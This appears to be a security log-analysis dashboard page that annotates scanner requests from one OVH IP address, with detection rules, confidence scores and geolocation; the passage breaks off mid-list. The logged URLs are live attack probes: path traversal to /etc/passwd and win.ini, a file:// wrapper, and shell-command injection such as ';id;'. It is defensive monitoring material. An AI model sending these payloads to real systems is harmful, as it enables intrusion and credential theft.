
Log Explorer

Fact drill-down for 51.68.76.141
Risk: 12 (LOW) | Scope: All time | All-time facts: 163 | In-scope: 163 | Filtered: 163 | Seen: 2024-11-13 to 2025-04-22

Annotated access events

Showing page 1 / 4 — total 163 rows
#1 2025-04-22 00:10:03 event 5374049 GET 404 bytes 28426
ann sfp 8 label sensitive_file
Request File/path-style parameter observed (weak hint)
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
Annotation facts
label
sensitive_file
rule
sfp:param:file_path_hint
conf
60.00
details
A file/path/download-style parameter was present; treated as a weak correlating hint. Snippet='file/path/download param present'
More (full fields + snapshot) expand
url
/__screenshot-error?file=/etc/passwd
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
summary
File/path-style parameter observed (weak hint)
details
A file/path/download-style parameter was present; treated as a weak correlating hint. Snippet='file/path/download param present'
subnet
51.68.76.0/24
asn
16276 — OVH SAS
geo
France, Hauts-de-France, Roubaix
org
OVH
#2 2025-04-22 00:10:03 event 5374049 GET 404 bytes 28426
ann sfp 44 label sensitive_file
Request Probe for OS credential/secret file
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
Annotation facts
label
sensitive_file
rule
sfp:file:os_secrets
conf
94.00
details
Request targeted OS credential/secret artifacts (e.g., /etc/passwd, shadow). Snippet='/__screenshot-error?file=/etc/passwd'
More (full fields + snapshot) expand
url
/__screenshot-error?file=/etc/passwd
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
summary
Probe for OS credential/secret file
details
Request targeted OS credential/secret artifacts (e.g., /etc/passwd, shadow). Snippet='/__screenshot-error?file=/etc/passwd'
subnet
51.68.76.0/24
asn
16276 — OVH SAS
geo
France, Hauts-de-France, Roubaix
org
OVH
#3 2025-04-22 00:10:03 event 5374052 POST 301 bytes 169
ann base label observed
Request event observed
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
Annotation facts
label
observed
rule
base_observed
conf
details
More (full fields + snapshot) expand
url
/wp-admin/admin-ajax.php
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
summary
event observed
details
subnet
51.68.76.0/24
asn
16276 — OVH SAS
geo
France, Hauts-de-France, Roubaix
org
OVH
#4 2025-04-22 00:10:03 event 5374049 GET 404 bytes 28426
ann base label observed
Request event observed
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
Annotation facts
label
observed
rule
base_observed
conf
details
More (full fields + snapshot) expand
url
/__screenshot-error?file=/etc/passwd
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
summary
event observed
details
subnet
51.68.76.0/24
asn
16276 — OVH SAS
geo
France, Hauts-de-France, Roubaix
org
OVH
#5 2025-04-22 00:10:02 event 5374048 GET 400 bytes 157
ann ua 8 label ua
Request Very short User-Agent string
referer
-
UA
-
Annotation facts
label
ua
rule
ua:very_short
conf
65.00
details
Short/generic UAs are common in basic scripts and commodity automation.
More (full fields + snapshot) expand
url
/%2e%2e/%2e%2e/etc/passwd
referer
-
UA
-
summary
Very short User-Agent string
details
Short/generic UAs are common in basic scripts and commodity automation.
subnet
51.68.76.0/24
asn
16276 — OVH SAS
geo
France, Hauts-de-France, Roubaix
org
OVH
#6 2025-04-22 00:10:02 event 5374048 GET 400 bytes 157
ann trav 28 label trav
Request Path traversal / LFI indicator detected
referer
-
UA
-
Annotation facts
label
trav
rule
trav:dotdot_slash
conf
92.00
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
More (full fields + snapshot) expand
url
/%2e%2e/%2e%2e/etc/passwd
referer
-
UA
-
summary
Path traversal / LFI indicator detected
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
subnet
51.68.76.0/24
asn
16276 — OVH SAS
geo
France, Hauts-de-France, Roubaix
org
OVH
#7 2025-04-22 00:10:02 event 5374048 GET 400 bytes 157
ann trav 30 label trav
Request Path traversal / LFI indicator detected
referer
-
UA
-
Annotation facts
label
trav
rule
trav:encoded_dotdot
conf
93.00
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
More (full fields + snapshot) expand
url
/%2e%2e/%2e%2e/etc/passwd
referer
-
UA
-
summary
Path traversal / LFI indicator detected
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
subnet
51.68.76.0/24
asn
16276 — OVH SAS
geo
France, Hauts-de-France, Roubaix
org
OVH
#8 2025-04-22 00:10:02 event 5374048 GET 400 bytes 157
ann trav 34 label trav
Request Path traversal / LFI indicator detected
referer
-
UA
-
Annotation facts
label
trav
rule
trav:sensitive_target
conf
95.00
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
More (full fields + snapshot) expand
url
/%2e%2e/%2e%2e/etc/passwd
referer
-
UA
-
summary
Path traversal / LFI indicator detected
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
subnet
51.68.76.0/24
asn
16276 — OVH SAS
geo
France, Hauts-de-France, Roubaix
org
OVH
#9 2025-04-22 00:10:02 event 5374048 GET 400 bytes 157
ann sfp 34 label sensitive_file
Request Directory traversal indicator
referer
-
UA
-
Annotation facts
label
sensitive_file
rule
sfp:traversal
conf
86.00
details
Traversal sequences were present (raw or encoded). Snippet='/%2e%2e/%2e%2e/etc/passwd'
More (full fields + snapshot) expand
url
/%2e%2e/%2e%2e/etc/passwd
referer
-
UA
-
summary
Directory traversal indicator
details
Traversal sequences were present (raw or encoded). Snippet='/%2e%2e/%2e%2e/etc/passwd'
subnet
51.68.76.0/24
asn
16276 — OVH SAS
geo
France, Hauts-de-France, Roubaix
org
OVH
#10 2025-04-22 00:10:02 event 5374048 GET 400 bytes 157
ann sfp 44 label sensitive_file
Request Probe for OS credential/secret file
referer
-
UA
-
Annotation facts
label
sensitive_file
rule
sfp:file:os_secrets
conf
94.00
details
Request targeted OS credential/secret artifacts (e.g., /etc/passwd, shadow). Snippet='/%2e%2e/%2e%2e/etc/passwd'
More (full fields + snapshot) expand
url
/%2e%2e/%2e%2e/etc/passwd
referer
-
UA
-
summary
Probe for OS credential/secret file
details
Request targeted OS credential/secret artifacts (e.g., /etc/passwd, shadow). Snippet='/%2e%2e/%2e%2e/etc/passwd'
subnet
51.68.76.0/24
asn
16276 — OVH SAS
geo
France, Hauts-de-France, Roubaix
org
OVH
#11 2025-04-22 00:10:02 event 5374046 GET 404 bytes 28426
ann sfp 36 label sensitive_file
Request Command-style parameter observed
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
Annotation facts
label
sensitive_file
rule
sfp:param:cmd
conf
86.00
details
A command-execution style query parameter was present (cmd/exec/command/shell). Snippet='/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;id;%27'
More (full fields + snapshot) expand
url
/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;id;%27
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
summary
Command-style parameter observed
details
A command-execution style query parameter was present (cmd/exec/command/shell). Snippet='/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;id;%27'
subnet
51.68.76.0/24
asn
16276 — OVH SAS
geo
France, Hauts-de-France, Roubaix
org
OVH
#12 2025-04-22 00:10:02 event 5374048 GET 400 bytes 157
ann scan_velocity 28 label scan_velocity
Request Scan-velocity indicator: scanv:rpm
referer
-
UA
-
Annotation facts
label
scan_velocity
rule
scanv:rpm
conf
90.00
details
rpm_equiv=74.0; score=14; window=90s; total=111; rpm_equiv=74.0; upm_nonstatic_equiv=25.3; 404=108/111(0.97); ext_hits=90; ua_sig=0; methods=['GET', 'POST']
More (full fields + snapshot) expand
url
/%2e%2e/%2e%2e/etc/passwd
referer
-
UA
-
summary
Scan-velocity indicator: scanv:rpm
details
rpm_equiv=74.0; score=14; window=90s; total=111; rpm_equiv=74.0; upm_nonstatic_equiv=25.3; 404=108/111(0.97); ext_hits=90; ua_sig=0; methods=['GET', 'POST']
subnet
51.68.76.0/24
asn
16276 — OVH SAS
geo
France, Hauts-de-France, Roubaix
org
OVH
#13 2025-04-22 00:10:02 event 5374048 GET 400 bytes 157
ann scan_velocity 28 label scan_velocity
Request Scan-velocity indicator: scanv:ext_enum
referer
-
UA
-
Annotation facts
label
scan_velocity
rule
scanv:ext_enum
conf
90.00
details
ext_hits=90; score=14; window=90s; total=111; rpm_equiv=74.0; upm_nonstatic_equiv=25.3; 404=108/111(0.97); ext_hits=90; ua_sig=0; methods=['GET', 'POST']
More (full fields + snapshot) expand
url
/%2e%2e/%2e%2e/etc/passwd
referer
-
UA
-
summary
Scan-velocity indicator: scanv:ext_enum
details
ext_hits=90; score=14; window=90s; total=111; rpm_equiv=74.0; upm_nonstatic_equiv=25.3; 404=108/111(0.97); ext_hits=90; ua_sig=0; methods=['GET', 'POST']
subnet
51.68.76.0/24
asn
16276 — OVH SAS
geo
France, Hauts-de-France, Roubaix
org
OVH
#14 2025-04-22 00:10:02 event 5374048 GET 400 bytes 157
ann scan_velocity 28 label scan_velocity
Request Scan-velocity indicator: scanv:404_ratio
referer
-
UA
-
Annotation facts
label
scan_velocity
rule
scanv:404_ratio
conf
90.00
details
404=108/111(0.97); score=14; window=90s; total=111; rpm_equiv=74.0; upm_nonstatic_equiv=25.3; 404=108/111(0.97); ext_hits=90; ua_sig=0; methods=['GET', 'POST']
More (full fields + snapshot) expand
url
/%2e%2e/%2e%2e/etc/passwd
referer
-
UA
-
summary
Scan-velocity indicator: scanv:404_ratio
details
404=108/111(0.97); score=14; window=90s; total=111; rpm_equiv=74.0; upm_nonstatic_equiv=25.3; 404=108/111(0.97); ext_hits=90; ua_sig=0; methods=['GET', 'POST']
subnet
51.68.76.0/24
asn
16276 — OVH SAS
geo
France, Hauts-de-France, Roubaix
org
OVH
#15 2025-04-22 00:10:02 event 5374048 GET 400 bytes 157
ann scan_velocity label scan_velocity
Request Scan-velocity window summary
referer
-
UA
-
Annotation facts
label
scan_velocity
rule
scanv:window
conf
details
window=90s; total=111; rpm_equiv=74.0; upm_nonstatic_equiv=25.3; 404=108/111(0.97); ext_hits=90; ua_sig=0; methods=['GET', 'POST']
More (full fields + snapshot) expand
url
/%2e%2e/%2e%2e/etc/passwd
referer
-
UA
-
summary
Scan-velocity window summary
details
window=90s; total=111; rpm_equiv=74.0; upm_nonstatic_equiv=25.3; 404=108/111(0.97); ext_hits=90; ua_sig=0; methods=['GET', 'POST']
subnet
51.68.76.0/24
asn
16276 — OVH SAS
geo
France, Hauts-de-France, Roubaix
org
OVH
#16 2025-04-22 00:10:02 event 5374048 GET 400 bytes 157
ann base label observed
Request event observed
referer
-
UA
-
Annotation facts
label
observed
rule
base_observed
conf
details
More (full fields + snapshot) expand
url
/%2e%2e/%2e%2e/etc/passwd
referer
-
UA
-
summary
event observed
details
subnet
51.68.76.0/24
asn
16276 — OVH SAS
geo
France, Hauts-de-France, Roubaix
org
OVH
#17 2025-04-22 00:10:02 event 5374046 GET 404 bytes 28426
ann base label observed
Request event observed
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
Annotation facts
label
observed
rule
base_observed
conf
details
More (full fields + snapshot) expand
url
/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;id;%27
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
summary
event observed
details
subnet
51.68.76.0/24
asn
16276 — OVH SAS
geo
France, Hauts-de-France, Roubaix
org
OVH
#18 2025-04-22 00:10:02 event 5374046 GET 404 bytes 28426
ann cmdi 28 label cmdi
Request Command/file-injection indicator: cmdi:op_plus_cmd
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
Annotation facts
label
cmdi
rule
cmdi:op_plus_cmd
conf
88.00
details
Command separator/operator combined with a recognized command token. Snippet='GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=';id;' -'
More (full fields + snapshot) expand
url
/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;id;%27
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
summary
Command/file-injection indicator: cmdi:op_plus_cmd
details
Command separator/operator combined with a recognized command token. Snippet='GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=';id;' -'
subnet
51.68.76.0/24
asn
16276 — OVH SAS
geo
France, Hauts-de-France, Roubaix
org
OVH
#19 2025-04-22 00:10:02 event 5374046 GET 404 bytes 28426
ann cmdi 30 label cmdi
Request Command/file-injection indicator: cmdi:param_plus_cmd
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
Annotation facts
label
cmdi
rule
cmdi:param_plus_cmd
conf
90.00
details
Suspicious command parameter combined with a recognized command token. Snippet='GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=';id;' -'
More (full fields + snapshot) expand
url
/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;id;%27
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
summary
Command/file-injection indicator: cmdi:param_plus_cmd
details
Suspicious command parameter combined with a recognized command token. Snippet='GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=';id;' -'
subnet
51.68.76.0/24
asn
16276 — OVH SAS
geo
France, Hauts-de-France, Roubaix
org
OVH
#20 2025-04-22 00:10:01 event 5374045 GET 404 bytes 28426
ann sfp 36 label sensitive_file
Request Command-style parameter observed
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
Annotation facts
label
sensitive_file
rule
sfp:param:cmd
conf
86.00
details
A command-execution style query parameter was present (cmd/exec/command/shell). Snippet='/cgi-bin/admin.cgi?Command=sysCommand&Cmd=ifconfig'
More (full fields + snapshot) expand
url
/cgi-bin/admin.cgi?Command=sysCommand&Cmd=ifconfig
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
summary
Command-style parameter observed
details
A command-execution style query parameter was present (cmd/exec/command/shell). Snippet='/cgi-bin/admin.cgi?Command=sysCommand&Cmd=ifconfig'
subnet
51.68.76.0/24
asn
16276 — OVH SAS
geo
France, Hauts-de-France, Roubaix
org
OVH
#21 2025-04-22 00:10:01 event 5374045 GET 404 bytes 28426
ann base label observed
Request event observed
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
Annotation facts
label
observed
rule
base_observed
conf
details
More (full fields + snapshot) expand
url
/cgi-bin/admin.cgi?Command=sysCommand&Cmd=ifconfig
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
summary
event observed
details
subnet
51.68.76.0/24
asn
16276 — OVH SAS
geo
France, Hauts-de-France, Roubaix
org
OVH
#22 2025-04-22 00:10:01 event 5374044 POST 404 bytes 28426
ann base label observed
Request event observed
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
Annotation facts
label
observed
rule
base_observed
conf
details
More (full fields + snapshot) expand
url
/classes/common/busiFacade.php
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
summary
event observed
details
subnet
51.68.76.0/24
asn
16276 — OVH SAS
geo
France, Hauts-de-France, Roubaix
org
OVH
#23 2025-04-22 00:10:00 event 5374041 GET 404 bytes 28426
ann base label observed
Request event observed
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
Annotation facts
label
observed
rule
base_observed
conf
details
More (full fields + snapshot) expand
url
/php/ztp_gate.php/.js.map
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
summary
event observed
details
subnet
51.68.76.0/24
asn
16276 — OVH SAS
geo
France, Hauts-de-France, Roubaix
org
OVH
#24 2025-04-22 00:09:59 event 5374040 GET 404 bytes 28426
ann trav 32 label trav
Request Path traversal / LFI indicator detected
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
Annotation facts
label
trav
rule
trav:windows_sensitive_target
conf
94.00
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
More (full fields + snapshot) expand
url
/file=c:%5Cwindows%5Cwin.ini
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
summary
Path traversal / LFI indicator detected
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
subnet
51.68.76.0/24
asn
16276 — OVH SAS
geo
France, Hauts-de-France, Roubaix
org
OVH
#25 2025-04-22 00:09:59 event 5374039 GET 404 bytes 28426
ann sfp 44 label sensitive_file
Request Probe for OS credential/secret file
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
Annotation facts
label
sensitive_file
rule
sfp:file:os_secrets
conf
94.00
details
Request targeted OS credential/secret artifacts (e.g., /etc/passwd, shadow). Snippet='/file=/etc/passwd'
More (full fields + snapshot) expand
url
/file=/etc/passwd
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
summary
Probe for OS credential/secret file
details
Request targeted OS credential/secret artifacts (e.g., /etc/passwd, shadow). Snippet='/file=/etc/passwd'
subnet
51.68.76.0/24
asn
16276 — OVH SAS
geo
France, Hauts-de-France, Roubaix
org
OVH
#26 2025-04-22 00:09:59 event 5374040 GET 404 bytes 28426
ann base label observed
Request event observed
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
Annotation facts
label
observed
rule
base_observed
conf
details
More (full fields + snapshot) expand
url
/file=c:%5Cwindows%5Cwin.ini
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
summary
event observed
details
subnet
51.68.76.0/24
asn
16276 — OVH SAS
geo
France, Hauts-de-France, Roubaix
org
OVH
#27 2025-04-22 00:09:59 event 5374039 GET 404 bytes 28426
ann base label observed
Request event observed
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
Annotation facts
label
observed
rule
base_observed
conf
details
More (full fields + snapshot) expand
url
/file=/etc/passwd
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
summary
event observed
details
subnet
51.68.76.0/24
asn
16276 — OVH SAS
geo
France, Hauts-de-France, Roubaix
org
OVH
#28 2025-04-22 00:09:58 event 5374038 GET 404 bytes 28426
ann sfp 44 label sensitive_file
Request Probe for OS credential/secret file
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
Annotation facts
label
sensitive_file
rule
sfp:file:os_secrets
conf
94.00
details
Request targeted OS credential/secret artifacts (e.g., /etc/passwd, shadow). Snippet='/interview?i=/etc/passwd'
More (full fields + snapshot) expand
url
/interview?i=/etc/passwd
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
summary
Probe for OS credential/secret file
details
Request targeted OS credential/secret artifacts (e.g., /etc/passwd, shadow). Snippet='/interview?i=/etc/passwd'
subnet
51.68.76.0/24
asn
16276 — OVH SAS
geo
France, Hauts-de-France, Roubaix
org
OVH
#29 2025-04-22 00:09:58 event 5374038 GET 404 bytes 28426
ann base label observed
Request event observed
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
Annotation facts
label
observed
rule
base_observed
conf
details
More (full fields + snapshot) expand
url
/interview?i=/etc/passwd
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
summary
event observed
details
subnet
51.68.76.0/24
asn
16276 — OVH SAS
geo
France, Hauts-de-France, Roubaix
org
OVH
#30 2025-04-22 00:09:57 event 5374037 GET 404 bytes 28426
ann base label observed
Request event observed
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
Annotation facts
label
observed
rule
base_observed
conf
details
More (full fields + snapshot) expand
url
/device/config
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
summary
event observed
details
subnet
51.68.76.0/24
asn
16276 — OVH SAS
geo
France, Hauts-de-France, Roubaix
org
OVH
#31 2025-04-22 00:09:57 event 5374036 GET 404 bytes 28426
ann base label observed
Request event observed
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
Annotation facts
label
observed
rule
base_observed
conf
details
More (full fields + snapshot) expand
url
/system/config_menu.htm
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
summary
event observed
details
subnet
51.68.76.0/24
asn
16276 — OVH SAS
geo
France, Hauts-de-France, Roubaix
org
OVH
#32 2025-04-22 00:09:56 event 5374034 GET 200 bytes 27853
ann trav 30 label trav
Request Path traversal / LFI indicator detected
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
Annotation facts
label
trav
rule
trav:wrapper
conf
94.00
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
More (full fields + snapshot) expand
url
/?p=3232&wp_automatic=download&link=file:///etc/passwd
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
summary
Path traversal / LFI indicator detected
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
subnet
51.68.76.0/24
asn
16276 — OVH SAS
geo
France, Hauts-de-France, Roubaix
org
OVH
#33 2025-04-22 00:09:56 event 5374034 GET 200 bytes 27853
ann sfp 44 label sensitive_file
Request Probe for OS credential/secret file
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
Annotation facts
label
sensitive_file
rule
sfp:file:os_secrets
conf
94.00
details
Request targeted OS credential/secret artifacts (e.g., /etc/passwd, shadow). Snippet='/?p=3232&wp_automatic=download&link=file:///etc/passwd'
More (full fields + snapshot) expand
url
/?p=3232&wp_automatic=download&link=file:///etc/passwd
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
summary
Probe for OS credential/secret file
details
Request targeted OS credential/secret artifacts (e.g., /etc/passwd, shadow). Snippet='/?p=3232&wp_automatic=download&link=file:///etc/passwd'
subnet
51.68.76.0/24
asn
16276 — OVH SAS
geo
France, Hauts-de-France, Roubaix
org
OVH
#34 2025-04-22 00:09:56 event 5374034 GET 200 bytes 27853
ann base label observed
Request event observed
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
Annotation facts
label
observed
rule
base_observed
conf
details
More (full fields + snapshot) expand
url
/?p=3232&wp_automatic=download&link=file:///etc/passwd
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
summary
event observed
details
subnet
51.68.76.0/24
asn
16276 — OVH SAS
geo
France, Hauts-de-France, Roubaix
org
OVH
#35 2025-04-22 00:09:55 event 5374032 GET 404 bytes 28426
ann base label observed
Request event observed
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
Annotation facts
label
observed
rule
base_observed
conf
details
More (full fields + snapshot) expand
url
/Admin/Admin.aspx
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
summary
event observed
details
subnet
51.68.76.0/24
asn
16276 — OVH SAS
geo
France, Hauts-de-France, Roubaix
org
OVH
#36 2025-04-22 00:09:55 event 5374031 POST 404 bytes 7897
ann base label observed
Request event observed
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
Annotation facts
label
observed
rule
base_observed
conf
details
More (full fields + snapshot) expand
url
/clients/MyCRL
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
summary
event observed
details
subnet
51.68.76.0/24
asn
16276 — OVH SAS
geo
France, Hauts-de-France, Roubaix
org
OVH
#37 2025-04-22 00:09:54 event 5374030 GET 404 bytes 28426
ann base label observed
Request event observed
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
Annotation facts
label
observed
rule
base_observed
conf
details
More (full fields + snapshot) expand
url
/classes/common/busiFacade.php
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
summary
event observed
details
subnet
51.68.76.0/24
asn
16276 — OVH SAS
geo
France, Hauts-de-France, Roubaix
org
OVH
#38 2025-04-22 00:09:54 event 5374027 GET 404 bytes 28426
ann base label observed
Request event observed
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
Annotation facts
label
observed
rule
base_observed
conf
details
More (full fields + snapshot) expand
url
/render/info.html
referer
-
UA
